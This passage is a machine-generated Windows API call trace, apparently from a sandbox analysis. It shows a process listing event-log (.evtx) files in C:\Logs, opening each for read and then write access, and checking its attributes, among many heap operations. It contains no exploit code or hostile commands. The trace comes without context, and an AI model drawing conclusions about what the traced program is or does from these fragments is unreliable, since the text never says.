out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0071.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0071.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0071.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.784] AreFileApisANSI () returned 1 [0071.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 63 [0071.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.784] AreFileApisANSI () returned 1 [0071.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0071.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6df20 [0071.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=63 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 63 [0071.784] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.784] GetFileType (hFile=0x428) returned 0x1 [0071.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.784] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.785] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.785] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.785] CloseHandle (hObject=0x428) returned 1 [0071.785] AreFileApisANSI () returned 1 [0071.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0071.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e250 [0071.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=63 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 63 [0071.785] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.785] GetFileType (hFile=0x428) returned 0x1 [0071.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.785] CloseHandle (hObject=0x428) returned 1 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.786] AreFileApisANSI () returned 1 [0071.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0071.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e7a0 [0071.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=63 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 63 [0071.786] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.787] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.788] AreFileApisANSI () returned 1 [0071.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 50 [0071.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.788] AreFileApisANSI () returned 1 [0071.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0071.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46828 [0071.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 50 [0071.788] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.788] GetFileType (hFile=0x428) returned 0x1 [0071.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0071.788] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.789] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.789] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.789] CloseHandle (hObject=0x428) returned 1 [0071.789] AreFileApisANSI () returned 1 [0071.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0071.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45ef8 [0071.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 50 [0071.789] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.789] GetFileType (hFile=0x428) returned 0x1 [0071.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0071.789] CloseHandle (hObject=0x428) returned 1 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.790] AreFileApisANSI () returned 1 [0071.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0071.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46898 [0071.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 50 [0071.790] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.791] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.791] 